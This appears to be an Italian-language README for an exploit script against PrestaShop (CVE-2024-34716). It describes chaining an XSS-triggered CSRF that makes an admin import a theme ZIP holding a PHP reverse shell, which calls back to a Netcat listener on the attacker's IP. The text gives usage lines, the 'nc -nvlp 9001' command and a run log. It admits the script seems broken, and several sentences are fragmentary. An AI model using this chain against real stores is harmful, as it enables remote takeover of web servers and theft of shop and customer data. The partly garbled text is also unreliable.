
Automatizza un attacco CSRF contro CVE-2024-34716 per distribuire una reverse shell PHP su PrestaShop, con packaging automatico del payload e configurazione del listener Netcat.
Questo script automatizza un exploit CSRF (Cross-Site Request Forgery) per caricare una reverse shell PHP sul web server di un target ed eseguirla. La reverse shell viene fornita come file ZIP tramite un payload CSRF appositamente creato, che viene attivato quando un utente privilegiato interagisce con un endpoint specifico. Lo script richiede un'istanza Netcat in ascolto per catturare la connessione della reverse shell.
Sembra rotto per ora, sarà aggiornato in seguito
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: URL di base del target (es. https://example.com).admin_endpoint: Percorso verso l'endpoint di importazione del tema admin.admin_email: Indirizzo email di un amministratore (da spoofare per il payload).attacker_ip: Indirizzo IP dove il listener della reverse shell riceverà la connessione../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip e la porta 9001 forniti.love.php) viene compresso in Love-exploit.zip.csrf_payload.html) contenente uno script JavaScript per inviare automaticamente una richiesta malevola al pannello admin del target per importare la reverse shell.8000 serve Love-exploit.zip per l'importazione da parte del target.Avvia un listener Netcat sulla tua macchina:
nc -nvlp 9001
Esegui lo script:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Aspetta che il target esegua il payload CSRF e ricevi la connessione della reverse shell.
Lo script fornisce le seguenti informazioni durante l'esecuzione:
8000 (server HTTP) e 9001 (listener Netcat) siano libere prima di eseguire lo script.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
Questo documento è destinato all'uso da parte di penetration tester e ricercatori di cybersecurity in ambienti controllati. L'uso improprio di questo strumento per scopi non autorizzati è strettamente proibito.
Questo script è solo a scopo educativo e per valutazioni legali di cybersecurity. L'uso non autorizzato contro un sistema senza permesso è illegale e contrario alle linee guida etiche.